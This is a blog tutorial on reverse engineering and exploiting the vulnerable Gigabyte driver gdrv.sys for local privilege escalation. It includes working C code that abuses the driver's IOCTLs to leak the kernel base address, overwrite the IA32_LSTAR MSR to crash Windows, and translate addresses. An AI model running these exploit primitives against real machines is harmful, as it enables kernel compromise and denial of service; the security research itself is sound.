Exploiting gdrv.sys — A vulnerable Gigabyte driver

Posted Oct 6, 2024 Updated Feb 1, 2025

By Amit Moshel

52 min read

Hello everyone, in this article we’ll go through the process of reverse engineering and exploiting an old, vulnerable Gigabyte driver. I’ll demonstrate 2 ways of performing “Token Stealing” to achieve LPE (Local Privilege Escalation).

Before starting, if you’re not familiar with the way a driver is built, I highly recommend reading the previous article I wrote, where we went through the theory behind a driver and dove into the practical side by creating a basic driver.

For the sake of time, I already reversed the driver in IDA, but we’ll go through and try to understand the interesting functionalities of the driver.

Reversing gdrv.sys - Vulnerable Driver

Let’s load the “gdrv.sys” into IDA Pro:

The DriverInitializer() function takes as its first argument a pointer to the _DRIVER_OBJECT structure that represents the driver in kernel space. It is executed when the driver is loaded into kernel space.

The function starts by executing IoCreateDevice() to create a “Device Object” that will serve as an entity that implements the driver functionality and is accessible both from “User Mode” and “Kernel Mode”.

The “DeviceExtension” isn’t interesting for us, so we’ll skip over it. Next, a call to IoCreateSymbolicLink() is executed to make the driver easily accessible through a “symbolic link”.

After creating a “Symbolic Link”, the “Major Function” array of function pointers is assigned to a set of “Dispatch Routines” function pointers. As we can see in the image above, the same “Dispatch Routine” serves the IRP_MJ_CREATE, IRP_MJ_CLOSE and IRP_MJ_DEVICE_CONTROL implementation.

The last function pointer assignment is the “Unload Routine”, which is invoked when the driver is unloaded from kernel space:

The DeviceControlDispatchRoutine() is an interesting function that contains the core functionality of the driver. This function is very long, so I’ll try to focus on the relevant parts of it.

Let’s view the first part of it:

Like every dispatch routine of a driver, it takes 2 arguments. The first is a pointer to the _DEVICE_OBJECT (DeviceObject), and the second is a pointer to the _IRP (Irp) sent by another component on the system, which can originate from either “Kernel Mode” or “User Mode”.

First, the function starts by getting the address of the current IoStackLocation structure that resides at offset 0xB8 from the base address of the _IRP structure. It can also be obtained through the function IoGetCurrentIrpStackLocation().

The IoStackLocation structure contains important information of the IRP request that is relevant to the current device we’re dealing with in the “Device Stack”.

After getting the base address to the IoStackLocation, the function gets the Major Function index number, which is the first value in the “IoStackLocation”. The function also gets the SystemBuffer field which contains the “Input buffer” that comes from the requesting component, and also gets the “Input buffer” length.

If the Major Function of the IRP holds the index of IRP_MJ_DEVICE_CONTROL (0xE), a set of “if”, “else” and “switch()” statements is executed against the IOCTL number taken from IoStackLocation->Parameters.DeviceIoControl.IoControlCode.

One of the interesting IOCTLs is 0xC3502580:

This IOCTL, when called, invokes a vulnerable function that allows reading and writing MSRs (“Model Specific Registers”). MSRs are special registers that hold crucial information the CPU needs to function properly; for the most part, they aren’t affected by what the “Logical Processor” is executing.

Let’s view the “read_write_msr_caller_vulnerable()” function:

The function takes 3 arguments:

DEVICE_EXTENSION * DeviceExtension
IRP * PIRP
_IO_STACK_LOCATION * IoStackLocation

The SystemBuffer is treated as a DWORD array pointer. The function first checks if both the “InputBufferLength” and the “OutputBufferLength” are equal, and performs another check to see if their value is 0x10 (16) bytes.

If the first DWORD in the SystemBuffer holds the value 0, the requesting component wants to write to a certain MSR. In that case, the second DWORD in the SystemBuffer is the “MSR Index”, which identifies the MSR. The 3rd DWORD serves as the lower DWORD of the value to write and is loaded into a global variable. The 4th DWORD serves as the higher DWORD of that value and is also loaded into a global variable.

Then, another function, “writemsr_vulnerable”, is called. It performs the actual write using the “__writemsr()” intrinsic, which overwrites the MSR value:

Another option is if the first DWORD of the SystemBuffer is 1, which tells that the desired operation is to read a certain MSR register value:

The readmsr_vulnerable() function is called. The MSR index it uses was already stored in a global variable at the beginning of the function, taken from the 2nd DWORD in the SystemBuffer:

readmsr_vulnerable() executes the __readmsr() intrinsic, which reads an MSR value based on its given index, and returns that value:
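To make the 16-byte layout concrete, here is a minimal sketch of the request as the handler appears to parse it. The names MsrRequest, MakeReadRequest and MakeWriteRequest are hypothetical; they only mirror the four DWORDs described above and are not taken from the driver.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Hypothetical mirror of the four DWORDs the handler reads from the SystemBuffer.
struct MsrRequest {
    uint32_t Operation;  // 0 = write the MSR, 1 = read the MSR
    uint32_t MsrIndex;   // identifier of the MSR
    uint32_t LowDword;   // lower 32 bits of the value to write
    uint32_t HighDword;  // higher 32 bits of the value to write
};

// The handler only accepts buffers of exactly 0x10 bytes.
static_assert(sizeof(MsrRequest) == 0x10, "request must be 16 bytes");
static_assert(offsetof(MsrRequest, MsrIndex) == 4, "MSR index is the 2nd DWORD");

// Builds a read request: only the first two DWORDs are meaningful.
MsrRequest MakeReadRequest(uint32_t msrIndex)
{
    return MsrRequest{1, msrIndex, 0, 0};
}

// Builds a write request by splitting the 64-bit value into two DWORDs.
MsrRequest MakeWriteRequest(uint32_t msrIndex, uint64_t value)
{
    return MsrRequest{0, msrIndex,
                      static_cast<uint32_t>(value & 0xFFFFFFFFu),
                      static_cast<uint32_t>(value >> 32)};
}
```

Describing the buffer as a struct rather than a raw DWORD array lets the compiler check the size and offsets that the handler depends on.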

Another interesting IOCTL is 0xC350280C:

This IOCTL, when invoked, calls another function, which I named MmGetPhysicalAddress_vulnerable():

The function takes 2 arguments:

DeviceExtension
PIRP

The function expects within the SystemBuffer a “Virtual Address” that will be used as an argument to “MmGetPhysicalAddress()”, which is a function that takes as an argument a “Virtual Address”, and returns its “Physical Address”. The returned address is being written back into the SystemBuffer, which will return to the requestor in the “Output Buffer”.

The next IOCTL is a key IOCTL that will be used in our exploit and is 0xC3502808:

The function takes the following arguments (IDA shows 4, but in practice only 2 are used in the function):

DeviceExtension
PIRP

The “ArbitraryWrite_vulnerable()” function:

The function starts by getting the SystemBuffer pointer, sets Irp->IoStatus.Information to 0, then checks whether the pointer to the SystemBuffer is valid. If not, it returns the NTSTATUS value “0xC000000D” (STATUS_INVALID_PARAMETER).

Next, the function parses the SystemBuffer data which is the buffer information that was passed from the requestor in the following way:

1st 8 bytes (bytes 0–8) of the SystemBuffer are used as the “Destination Address”, which is the address the source data will be written to.
2nd 8 bytes (bytes 8–16) of the SystemBuffer are used as the “Source Address”, which is the address that holds the source data itself.
4 bytes at bytes 16–20 of the SystemBuffer are used as the “Size” field, a DWORD that describes the number of bytes to copy from the source address to the destination address.

With these values loaded into their respective “dest”, “src” and “size” variables, a “do-while” loop copies every byte from the source to the destination. Since the requestor controls all three values, this function is vulnerable to an “Arbitrary Write”, which can easily lead to LPE (Local Privilege Escalation).
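The layout and the copy loop can be sketched in plain user-mode C++. This is only a stand-in for what the decompiled handler appears to do: CopyRequest and EmulateHandlerCopy are hypothetical names, and the early return on a zero size is an assumption, since the article doesn't show how the driver treats that case.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

#pragma pack(push, 1)
// Hypothetical mirror of the 20 bytes the handler parses from the SystemBuffer.
struct CopyRequest {
    uint64_t Destination;  // bytes 0-8: where the data is written
    uint64_t Source;       // bytes 8-16: where the data is read from
    uint32_t Size;         // bytes 16-20: number of bytes to copy
};
#pragma pack(pop)

static_assert(offsetof(CopyRequest, Source) == 8, "source is the 2nd field");
static_assert(offsetof(CopyRequest, Size) == 16, "size follows both addresses");

// User-mode stand-in for the handler's byte-by-byte do-while loop.
// Neither address is validated, which is what makes the primitive arbitrary.
void EmulateHandlerCopy(const CopyRequest& request)
{
    auto* dest = reinterpret_cast<unsigned char*>(static_cast<uintptr_t>(request.Destination));
    auto* src = reinterpret_cast<const unsigned char*>(static_cast<uintptr_t>(request.Source));
    uint32_t size = request.Size;

    if (size == 0)
        return;  // assumption: nothing is copied for an empty request

    do {
        *dest++ = *src++;
    } while (--size);
}
```

In the real driver the same loop runs in kernel mode, so both addresses may point anywhere the kernel can access.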

Once we finish reversing all of the interesting functionality of the driver, we’ll get into the exploitation phase and see how we can leverage these potentially vulnerable functions to get a privileged shell as SYSTEM.

The next IOCTL that we’re going to reverse is 0xC3502000:

The 0xC3502000 IOCTL invokes the MmMapIoSpace_vulnerable():

The function starts by extracting the “InputBufferLength” from IoStackLocation->Parameters.DeviceIoControl.InputBufferLength, which resides at offset 0x10 from the base address of the “_IO_STACK_LOCATION” structure. Then, the function retrieves the address of the SystemBuffer through PIrp->AssociatedIrp.SystemBuffer.

The input that is passed through the SystemBuffer to this IOCTL handler function is parsed in the following way:

*(PSystemBuffer+8) holds the first argument to MmMapIoSpace(), which is a “Physical Address”. Getting a “Physical Address” shouldn’t be a problem, since we previously reversed an IOCTL handler that takes the first 8 bytes of the SystemBuffer, treats them as a Virtual Address, calls MmGetPhysicalAddress() and returns the result to the requestor.
*(PSystemBuffer+20) is a DWORD value that holds the number of bytes to map into the kernel virtual address space, starting from the base “Physical Address”.
*(PSystemBuffer+24) holds 8 bytes that serve as the “Destination address” in the memmove() function.

After understanding the way this IOCTL handler parses the SystemBuffer arguments, let’s understand what it practically does.

The function calls MmMapIoSpace(), which takes a “Physical Address” and a number of bytes, maps that range into the virtual address space of the kernel, and returns the mapped virtual address as its return value.

Next, memmove() is called. It takes a destination address, a source address and a number of bytes, and copies that many bytes from the source address to the destination address.

After memmove() is executed, MmUnmapIoSpace() is called to unmap the mapped virtual address range. It takes as arguments the virtual address returned from MmMapIoSpace() and the number of bytes that were mapped.
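As a rough sketch, a request for this handler could be packed at the three offsets listed above. BuildMapRequest and the constant names are hypothetical, and the 32-byte total size is an assumption: it is simply the smallest buffer that still holds the 8-byte destination at offset 24, while the length the driver actually expects isn't stated here.

```cpp
#include <array>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

constexpr std::size_t kPhysicalAddressOffset = 8;   // *(PSystemBuffer+8)
constexpr std::size_t kNumberOfBytesOffset   = 20;  // *(PSystemBuffer+20)
constexpr std::size_t kDestinationOffset     = 24;  // *(PSystemBuffer+24)
constexpr std::size_t kRequestSize           = 32;  // assumption, see the note above

using MapRequest = std::array<unsigned char, kRequestSize>;

// Packs the three fields the handler reads; all other bytes stay zero.
MapRequest BuildMapRequest(uint64_t physicalAddress, uint32_t numberOfBytes, uint64_t destination)
{
    static_assert(kDestinationOffset + sizeof(uint64_t) <= kRequestSize,
                  "destination must fit inside the request");
    assert(numberOfBytes != 0);  // mapping zero bytes would be pointless

    MapRequest buffer{};  // zero-initialized
    std::memcpy(buffer.data() + kPhysicalAddressOffset, &physicalAddress, sizeof(physicalAddress));
    std::memcpy(buffer.data() + kNumberOfBytesOffset, &numberOfBytes, sizeof(numberOfBytes));
    std::memcpy(buffer.data() + kDestinationOffset, &destination, sizeof(destination));
    return buffer;
}
```

Using memcpy at explicit offsets avoids depending on struct padding, which matters here because the size field sits at the unaligned-looking offset 20.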

The last interesting IOCTL is 0xC3502840:

The IOCTL number isn’t easily understandable from the set of “if” statements in the image above.

The 0xC3502840 IOCTL handler starts by checking whether both the InputBufferLength and OutputBufferLength are 16 bytes in size.

Next, for explanation purposes, I’ll explain how the “Input Buffer” is passed from the requestor before explaining the rest of the IOCTL handler.

The first 4 bytes of the “System Buffer” (0->4 bytes) hold a “Physical Address”.

The 8th->12th bytes of the “System Buffer” is a DWORD value that holds the “NumberOfBytes”, which is the number of bytes to map in the MmMapIoSpace().

As just said, the IOCTL handler performs a call to MmMapIoSpace() to map a “Physical Address” into the virtual address space of the kernel.

Next, IoAllocateMdl() is called with the first argument being the “MappedSpace” variable, which is the mapped virtual address, and the second argument being the “NumberOfBytes” field; the rest of the arguments are less interesting to us. An MDL (Memory Descriptor List) is a kernel-mode structure that describes a range of memory and is mainly used in “DMA” (Direct Memory Access) operations.

The call to MmBuildMdlForNonPagedPool() comes next, and it takes the allocated MDL structure as its first argument. This function updates the MDL so that it describes the underlying “physical pages” as PFNs (Page Frame Numbers). If the terms “MDL” and “PFN” aren’t familiar to you, I recommend reading both the “Memory Management” and “The basics of Device Objects, Drivers, IRPs and Related Concepts in Windows” articles I wrote a few months ago.

Next, a call for MmMapLockedPages() occurs. MmMapLockedPages() is a function that maps the physical pages described by an MDL into either SYSTEM space or user space, depending on the specified flags.

It takes 2 arguments:

MDL - In this case, an MDL built for the space that was mapped through the call to MmMapIoSpace().
KPROCESSOR_MODE enum.

The second argument of the MmMapLockedPages() isn’t clearly shown in the decompiler, so I’ll show the assembly:

The second argument for MmMapLockedPages() is byte sized and resides in the “dl” register, which holds the value 1. According to the MSDN documentation, the second argument is a “KPROCESSOR_MODE” enum that holds 2 values:

0 value -> Kernel Mode (can be easily remembered by “Ring 0” — which represents the kernel).
1 value -> User Mode.

In our case, the “dl” register is set to 1, which means that the mapped address in “Kernel Mode” is going to have another view in “User Mode”.

This means that the IOCTL performs 2 mappings: one using MmMapIoSpace(), which takes a physical address as an argument and maps it into non-paged pool kernel space memory, and a second using MmMapLockedPages(), which takes an MDL built for the mapped memory as its first argument and maps it to user mode.

Next, an internal structure is allocated using the ExAllocatePool() function and filled with information about the mapped memory and the MDL:

After populating the structure, the “MappedAddress” variable (which is the “User-Mode” address) returned from the call to MmMapLockedPages() is returned to the requestor through the SystemBuffer.

For the sake of length, I only reversed this IOCTL and won’t present an exploitation attempt for it. I challenge you to write a function that attempts to exploit it and see for yourself if this IOCTL is exploitable or not.

Now, with an understanding of the major interesting IOCTLs of the driver, it’s time to get into the exploitation phase.

Exploit Development - Attempt 1 - Arbitrary Memory Mapping

We’ll first start with creating a user-mode client written in C that’s going to have a set of functions that we’re going to implement. Each function is going to obtain a handle to the created Device Object of the driver and implement an interaction with one of the IOCTLs that we previously reversed.

The code starts by defining several macros, each holding an IOCTL code that we’re going to interact with:

  
#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>
#include <winternl.h>

#define IOCTL_MmGetPhysicalAddress 0xC350280C
#define IOCTL_MmMapIoSpace         0xC3502000
#define IOCTL_MmMapIoSpace2        0xC3502840

// For ReadMSR():
// IOCTL 0xC3502580
// InputBufferLength == OutputBufferLength && InputBufferLength == 16
// *(DWORD*)PSystemBuffer == 1
// can be used to leak the address stored in the IA32_LSTAR MSR
#define IOCTL_readmsr_caller       0xC3502580   

// For WriteMSR():
// IOCTL 0xC3502580
// *(DWORD*)PSystemBuffer == 0
// can be used to write the IA32_LSTAR MSR and overwrite the KiSystemCall64() address
#define IOCTL_writemsr_caller      0xC3502580   

#define IOCTL_ZwUnmapViewOfSection 0xC3502008
#define IOCTL_ArbitraryWrite       0xC3502808 

#pragma comment(lib, "ntdll")

#define SystemHandleInformation 0x10
//#define SystemHandleInformationSize 1024 * 1024 * 2

#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004

extern "C" NTSTATUS NtQuerySystemInformation(
    SYSTEM_INFORMATION_CLASS SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
);

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
    USHORT UniqueProcessId;
    USHORT CreatorBackTraceIndex;
    UCHAR ObjectTypeIndex;
    UCHAR HandleAttributes;
    USHORT HandleValue;
    PVOID Object;
    ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;

typedef struct _SYSTEM_HANDLE_INFORMATION {
    ULONG NumberOfHandles;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;

The first IOCTL that we’re going to create an interaction function for is 0xC3502580, which is responsible for performing a read/write interaction with MSR registers:

  
ULONG_PTR ReadMSR(DWORD MSRIndex)
{
    printf("[*] in ReadMSR()...\nPress Enter to continue...");
    getchar();

    //Name of the device might be different!!
    HANDLE hDevice = CreateFile(L"\\\\.\\GIO", GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, 0, nullptr);
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] Handle to the device couldn't be created: %u\n", GetLastError());
        return -1;
    }
    printf("[+] Handle to device \\\\.\\GIO was opened successfully!!\n");

    DWORD* InputBuffer = (DWORD*)calloc(1, 0x10);
    DWORD* OutputBuffer = (DWORD*)calloc(1, 0x10);

    InputBuffer[0] = 1; // 1 is the value that invokes the ReadMSR() function in the driver
    InputBuffer[1] = MSRIndex;

    DWORD BytesReturned = 0;
    if (DeviceIoControl(hDevice, IOCTL_readmsr_caller, InputBuffer, 0x10, OutputBuffer, 0x10, &BytesReturned, nullptr))
    {
        printf("[+] ReadMSR() DeviceIoControl (0x%x) executed successfully!\n", IOCTL_readmsr_caller);

        DWORD HighDWORD = OutputBuffer[3];
        DWORD LowDWORD = OutputBuffer[2];

        UINT64 KiSystemCall64Address = ((UINT64)HighDWORD << 32) | (UINT64)LowDWORD;
        printf("[+] Leaked nt!KiSystemCall64 address: 0x%llx\n", KiSystemCall64Address);

        // --- Clearing and returning---
        free(InputBuffer);
        free(OutputBuffer);

        CloseHandle(hDevice);
        return KiSystemCall64Address;
    }

    printf("[-] Unable to call IOCTL 0x%x: GetLastError(): %u\n", IOCTL_readmsr_caller, GetLastError());

    free(InputBuffer);
    free(OutputBuffer);

    CloseHandle(hDevice);
    return -1;
}

The function starts by obtaining a handle to the GIO device object, which is the name of the device object created by the “gdrv.sys” driver when it’s loaded into kernel space.

Next, an InputBuffer and an OutputBuffer are allocated, each 0x10 (16) bytes in size and accessed at DWORD granularity.

The first DWORD of the InputBuffer tells the IOCTL handler whether the request intends to write to or read from a certain MSR. In this case, the value is “1”, which means that the request’s intention is to read a value from a certain MSR.

The second DWORD of the InputBuffer is the “MSRIndex” of the register the function is going to read from.

With these 2 DWORDs properly set, DeviceIoControl() is called on the device handle, which generates an IRP to the “Device Object” and invokes the IOCTL 0xC3502580.

After DeviceIoControl() executes successfully, the returned MSR value is split across 2 DWORDs. The “High DWORD” resides in OutputBuffer[3], and the “Low DWORD” resides in OutputBuffer[2]. Using a shift and a bitwise OR, I combine them into a single 64-bit value that the function returns.
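The recombination step can be isolated into a small portable helper. MsrValueFromOutput is a hypothetical name, and the sketch assumes only what the article states: the low half is in OutputBuffer[2] and the high half is in OutputBuffer[3].

```cpp
#include <cassert>
#include <cstdint>

// Joins the two halves the driver returns: output[2] is the low DWORD,
// output[3] is the high DWORD.
uint64_t MsrValueFromOutput(const uint32_t (&output)[4])
{
    // Widen to 64 bits before shifting; shifting a 32-bit value by 32 is undefined.
    const uint64_t high = output[3];
    const uint64_t low = output[2];
    return (high << 32) | low;
}
```

Widening before the shift is the important detail: without it, the high DWORD would be shifted inside a 32-bit type and lost.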

The only thing we need to do before testing this functionality is to write the main() function that invokes the ReadMSR() function we just created:

  
int main()
{
    printf("[*] Starting execution...\n");
    DWORD IA32_LSTAR_MSR = 0xC0000082;
    ULONG_PTR KiSystemCall64Address = ReadMSR(IA32_LSTAR_MSR);
    printf("[*] Leaked nt!KiSystemCall64 address: 0x%p\n", KiSystemCall64Address);

    getchar();
}

The value I passed is the DWORD index of an MSR called IA32_LSTAR, and I’ll explain its use later.

To test the program, we need to load the driver into the kernel of a virtual machine that’s going to be debugged using “WinDbg” and set a breakpoint on the “call” instruction, which resides at “gdrv+0x2F62”:

Now, let’s transfer the file and execute it, which is going to invoke the breakpoint:

From the reverse engineering we did previously, we know that the function takes 3 arguments:

DeviceExtension (rcx)
PIRP (rdx)
IoStackLocation (r8)

Executing the !ioctldecode 0xC3502580 extension command in WinDbg:

We can see that the buffering method is METHOD_BUFFERED, which means that both the input buffer and the output buffer go through the “System Buffer”.
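The same decoding can be done by hand, because an IOCTL code packs four fields according to the CTL_CODE layout: device type in bits 31-16, required access in bits 15-14, function number in bits 13-2, and transfer method in bits 1-0. The sketch below is a portable illustration; IoctlFields and DecodeIoctl are hypothetical names, not WinDbg or WDK APIs.

```cpp
#include <cassert>
#include <cstdint>

// The four fields packed into an IOCTL code by the CTL_CODE macro.
struct IoctlFields {
    uint32_t DeviceType;  // bits 31-16
    uint32_t Access;      // bits 15-14 (0 = FILE_ANY_ACCESS)
    uint32_t Function;    // bits 13-2
    uint32_t Method;      // bits 1-0 (0 = METHOD_BUFFERED)
};

constexpr IoctlFields DecodeIoctl(uint32_t code)
{
    return IoctlFields{code >> 16, (code >> 14) & 0x3u, (code >> 2) & 0xFFFu, code & 0x3u};
}

// The MSR IOCTL from this article uses buffered I/O.
static_assert(DecodeIoctl(0xC3502580u).Method == 0, "expected METHOD_BUFFERED");
```

For 0xC3502580 this yields device type 0xC350, function 0x960, access 0 and method 0, which matches the METHOD_BUFFERED result above.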

Let’s view the SystemBuffer and validate that the data was transferred successfully from our client code:

  
dt nt!_IRP @rdx AssociatedIrp.

dd 0xffff9a88a72ed840

We can see that the first DWORD holds the value of “1” (for reading MSR value), and the second DWORD is the MSR Index. This means that the buffer was transferred correctly into the driver and is going to be executed. What we expect is the MSR value to be returned.

Let’s press “g” in WinDbg to continue execution:

We can see that the returned value is a kernel-mode address, the address of nt!KiSystemCall64. When a “syscall” instruction is executed, the CPU transfers execution from user mode to kernel mode. It does so by jumping to nt!KiSystemCall64, and the MSR that holds this function’s address is IA32_LSTAR (which has an index value of 0xC0000082).

Since we have a kernel mode address for a function, it’s possible to leak the “ntoskrnl.exe” base address by getting its RVA and subtracting it from the address we received:

Subtracting the dummy “ntoskrnl.exe” base address in IDA from the function’s address in IDA gives the offset: 0x40C600. Please note that this offset may differ between OS versions.
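As a worked example of the arithmetic, the sketch below subtracts the 0x40C600 offset from a leaked address and adds a cheap sanity check. The function names are hypothetical, and the only assumption in the check is that a loaded image starts on a page boundary, so a result with non-zero low 12 bits suggests the offset doesn't match the running kernel build.

```cpp
#include <cassert>
#include <cstdint>

constexpr uint64_t kKiSystemCall64Rva = 0x40C600;  // offset from the article; build-specific
constexpr uint64_t kPageMask = 0xFFF;              // low 12 bits of a 4 KB page

// Base address = leaked function address - the function's RVA.
uint64_t NtoskrnlBaseFromLeak(uint64_t leakedKiSystemCall64)
{
    assert(leakedKiSystemCall64 >= kKiSystemCall64Rva);
    return leakedKiSystemCall64 - kKiSystemCall64Rva;
}

// Sanity check: an image base is expected to be page aligned.
bool LooksLikeImageBase(uint64_t candidate)
{
    return candidate != 0 && (candidate & kPageMask) == 0;
}
```

With a made-up leak of 0xFFFFF8031240C600, the subtraction gives 0xFFFFF80312000000, which passes the alignment check.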

The following helper function, LeakNtoskrnlBaseAddress(), is used for leaking the “ntoskrnl.exe” base address:

  
ULONG_PTR LeakNtoskrnlBaseAddress()
{
    DWORD MSRIndex = 0xC0000082;
    ULONG_PTR KiSystemCall64Address = ReadMSR(MSRIndex);
    DWORD KiSystemCall64Rva = 0x40C600; // RVA of nt!KiSystemCall64; this might be different between versions of Windows !!!

    printf("[+] RVA of nt!KiSystemCall64: 0x%x\n", KiSystemCall64Rva);

    // ntoskrnl.exe base address can be found in IDA under: Edit -> Segments -> Rebase Program...
    ULONG_PTR BaseAddress = KiSystemCall64Address - KiSystemCall64Rva;
    printf("[+] Leaked ntoskrnl.exe base address: 0x%p\n", BaseAddress);

    return BaseAddress;
}

The main() function:

  
int main()
{
    printf("[+] Starting execution...\n");
    ULONG_PTR NtoskrnlBaseAddress = LeakNtoskrnlBaseAddress();
    getchar();
}

Executing the modified program:

We have successfully leaked the “ntoskrnl.exe” base address. This will be useful later in the exploitation.

The next function we’re going to implement is WriteMSR(). We won’t have any useful interaction with it in our exploitation, but it’s still shown for demonstration and learning purposes.

The WriteMSR() function implementation:

  
VOID WriteMSR(DWORD MSRIndex, ULONG_PTR Overwrite)
{
    printf("[*] in WriteMSR()...\nPress Enter to continue...");
    getchar();

    //Name of the device might be different!!
    HANDLE hDevice = CreateFile(L"\\\\.\\GIO", GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, 0, nullptr);
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] Handle to the device couldn't be created: %u\n", GetLastError());
        return;
    }

    printf("[+] Handle to device \\\\.\\GIO was opened successfully!!\n");

    DWORD* InputBuffer = (DWORD*)calloc(1, 0x10);
    DWORD* OutputBuffer = (DWORD*)calloc(1, 0x10);

    DWORD LowDWORD = (DWORD)(Overwrite & 0xFFFFFFFF);           // obtain lower DWORD of Overwrite variable
    DWORD HighDWORD = (DWORD)((Overwrite >> 32) & 0xFFFFFFFF);  // obtain higher DWORD of Overwrite variable

    InputBuffer[0] = 0;         // 0 is the value that invokes the WriteMSR() function in the driver
    InputBuffer[1] = MSRIndex;  // The MSR register index that we want to overwrite
    InputBuffer[2] = LowDWORD;  // Lower 32-bit value that the MSR will be overwritten with
    InputBuffer[3] = HighDWORD; // Higher 32-bit value that the MSR will be overwritten with

    DWORD BytesReturned = 0;
    if (DeviceIoControl(hDevice, IOCTL_writemsr_caller, InputBuffer, 0x10, OutputBuffer, 0x10, &BytesReturned, nullptr))
    {
        DebugBreak();
        printf("[+] WriteMSR() DeviceIoControl (0x%x) executed successfully!\n", IOCTL_writemsr_caller);
    }
    free(InputBuffer);
    free(OutputBuffer);

    CloseHandle(hDevice);

}

The WriteMSR() function leverages the same IOCTL (0xC3502580) used in the “ReadMSR()” function. It takes 2 arguments: the MSRIndex, which is the index of the MSR whose value is going to be overwritten, and the value to overwrite it with.

The function starts by opening a handle to the GIO device object and allocating both InputBuffer and OutputBuffer memory, sized 0x10 (16) bytes.

Next, we declare 2 DWORD variables, one that takes the lower DWORD of the “Overwrite” argument, and a second that takes the higher DWORD of the “Overwrite” argument.

With these variables created, the next thing is to construct the InputBuffer in the correct manner, so the data will be parsed correctly when being executed by the driver. The InputBuffer is constructed as the following:

1st DWORD holds the value of 0, which tells the IOCTL handler that the purpose of the IRP is to use the “write” functionality that writes a value into a given MSR.
2nd DWORD holds the MSR Index, which is the identifier of the MSR.
3rd DWORD is the lower DWORD of the “overwrite” argument.
4th DWORD is the higher DWORD of the “overwrite” argument.

With the “InputBuffer” properly constructed, a DeviceIoControl() request is sent to the 0xC3502580 IOCTL, which invokes the MSR writing functionality. This functionality can be leveraged at least for a DoS attack that causes a “Bug Check” on the machine: by overwriting the “IA32_LSTAR” MSR with an invalid address, whenever a “syscall” instruction is used to transfer execution into kernel mode (specifically to nt!KiSystemCall64), execution is transferred to invalid memory.

Let’s examine the function execution with WinDbg. But first, let’s view the modified main() function that calls the WriteMSR() function:

  
int main()
{
    printf("[+] Starting execution...\n");
    ULONG_PTR NtoskrnlBaseAddress = LeakNtoskrnlBaseAddress();
    getchar();
    printf("[*] Calling WriteMSR() and modifying IA32_LSTAR_MSR Register\n");

    WriteMSR(0xC0000082, 0xffffffffffffffff);
    getchar();
}

Let’s execute the program and stop right before the invocation of the WriteMSR() function:

Now let’s break in WinDbg and view the IA32_LSTAR MSR using the rdmsr command right before modifying it:

rdmsr 0xC0000082

Now, let’s set a breakpoint on the start of the reversed read_write_msr_caller_vulnerable() and view the IRP which is the second argument (rdx):

The breakpoint was hit, now let’s view the SystemBuffer and validate that the buffer was passed correctly to the handler:

  
dt nt!_IRP @rdx AssociatedIrp.

Viewing the SystemBuffer, we can see that it was passed correctly: the 1st DWORD is 0, the 2nd DWORD is the MSR Index, and the 3rd and 4th DWORDs are the low and high DWORDs of the overwrite value.

Continuing the execution, and breaking again to inspect the new value in the “IA32_LSTAR” MSR:

rdmsr 0xC0000082

As we can see, the value was successfully overwritten and caused the system to crash.

So far, we’ve implemented 3 helper functions: two that read and write MSRs, and one that leaks the ntoskrnl.exe base address.

The next function we’re going to implement interacts with the 0xC350280C IOCTL that indirectly performs a call to MmGetPhysicalAddress() and returns a Physical Address to the output buffer.

This is the helper function implementation:

  
ULONG_PTR GetPhysicalAddress(ULONG_PTR VirtualAddress)
{
    printf("[+] in GetPhysicalAddress()...\nPress Enter to continue...");
    getchar();

    //Name of the device might be different!!
    HANDLE hDevice2 = CreateFile(L"\\\\.\\GIO", GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, 0, nullptr);
    if (hDevice2 == INVALID_HANDLE_VALUE)
    {
        printf("[-] Handle to the device couldn't be created: %u\n", GetLastError());
        return -1;
    }

    printf("[+] Handle to device \\\\.\\GIO was opened successfully!!\n");

    ULONG_PTR* InputBuffer = (ULONG_PTR*)calloc(1, 8);      // 8 bytes virtual address to be translated
    ULONG_PTR* OutputBuffer = (ULONG_PTR*)calloc(1, 8);

    //RtlCopyMemory(InputBuffer, &VirtualAddress, )
    DWORD BytesReturned = 0;
    ULONG_PTR PhysicalAddress = 0; // 64 bits wide, so the returned physical address isn't truncated
    if (DeviceIoControl(hDevice2, IOCTL_MmGetPhysicalAddress, &VirtualAddress, 8, OutputBuffer, 8, &BytesReturned, nullptr))
    {
        PhysicalAddress = *OutputBuffer;
        printf("[+] GetPhysicalAddress() DeviceIoControl (0x%x) executed successfully!\n", IOCTL_MmGetPhysicalAddress);
        printf("[+] Physical Address returned for 0x%p is: 0x%p\n", VirtualAddress, PhysicalAddress);

        free(InputBuffer);
        free(OutputBuffer);
        CloseHandle(hDevice2);
        return PhysicalAddress;
    }

    printf("[-] Unable to execute IOCTL_MmGetPhysicalAddress, GetLastError(): %u\n", GetLastError());
    free(InputBuffer);
    free(OutputBuffer);
    CloseHandle(hDevice2);

    return -1;

}

The function takes a 64-bit virtual address as an argument and starts by opening a handle to the “GIO” device object. Next, an OutputBuffer of size 0x8 is allocated. Then, DeviceIoControl() is invoked with the 0xC350280C IOCTL, passing the virtual address as the input buffer.

Let’s view the modified main() function that calls this function:

  
int main()
{
    printf("[+] Starting execution...\n");
    ULONG_PTR PhysicalAddress = GetPhysicalAddress(0xfffff78000000000);
    printf("Physical Address returned: 0x%p\n", PhysicalAddress);
    getchar();

    return 0;
}

In this example, I passed the base address of “KUSER_SHARED_DATA”, which resides at 0xfffff78000000000.

Let’s execute the program and examine the “Physical Address” that’s returned:

Let’s compare the values that reside at both the “Physical Address” and the “Virtual Address”:

db fffff78000000000

We can see that the content within both the “Physical Address” and “Virtual Address” is the same, which confirms that the function is written correctly.

